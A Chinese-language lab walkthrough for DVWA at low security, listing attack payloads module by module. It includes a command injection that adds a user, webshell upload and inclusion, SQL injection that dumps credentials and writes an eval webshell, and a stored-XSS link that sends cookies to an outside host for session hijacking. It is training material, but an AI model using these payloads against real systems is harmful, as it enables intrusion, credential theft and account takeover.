dvwa 设置级别为low
1、brute force(暴力破解)
启动burpsute,暴力猜解 admin用户密码

2、Command Injection(命令行注入)
127.0.0.1 & net user zs 123 /add
127.0.0.1 & net user

3、csrf (跨站信息伪造)
启动 burp ,拦截csrf 的密码更改,生成csrf文档,写入 index.htm,将index.htm 复制到自建服务器 的c:\inetpub\wwwroot
诱使正正在操作后台者,访问 自己服务器的index.htm页面

4、File Inclusion (文件包含)
将“创建一句话木马.txt” 更名为aa.txt 并复制到 自建服务器 c:\inetpub\wwwroot
dvwa "file inlcude" 包含文件为http://自建服务器ip/aa.txt,注意创建木马后的url地址
启动过狗菜刀,连接一句话木马

5、File upload (文件上传)
将一句话木马更改扩展名为.jpg
用burpsuite 拦截上传操作,然后重新更改文件名为.php
启动过狗菜刀,连接一句话木马 http://192.168.226.175/dvwa/hackable/uploads/aa.php

6、Insecure CAPTCHA (不安全的验证码)
( 申请google验证码信息:
6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K )
step=1 ---> step=2

7、sql Injection (sql注入)
1' and '1'='1
1' order by 2 #
1' union select 1,database() #
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
1' union select user,password from users #


8、sql Injection (Blind) (sql盲注)

1' and length(database())=? #
1' and ascii(substr(database(),1,1))>100 #
1' and (select count (table_name) from information_schema.tables where table_schema=database() )=? #
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=? #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>103 #
1' and (select count(column_name) from information_schema.columns where table_name='users')=? # 显示存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit ?,1),1,1))>116 # (user字段)

1' union select 1,'<?php @eval($_POST["pass"]) ?>' into outfile 'c:/wamp/www/dvwa/my.php' #

9、weak Session IDs (弱会话id)
dvwaSession=3; security=low; PHPSESSID=

10、XSS(DOM) (XSS: 跨站脚本攻击)
11、XSS(Reflected)
<script> alert(document.cookie));</script>
12、XSS(Stored)
<a href="javascript:;" onClick="javascript:window.open('http://192.168.226.151/8nm/cookie.php?cookie='+document.cookie);">zs </a>
使用收集到的客户cookie值,替代本机cookie, 跳过身份认证,访问他人网站信息




Back to home | File page

Subscribe | Register | Login | N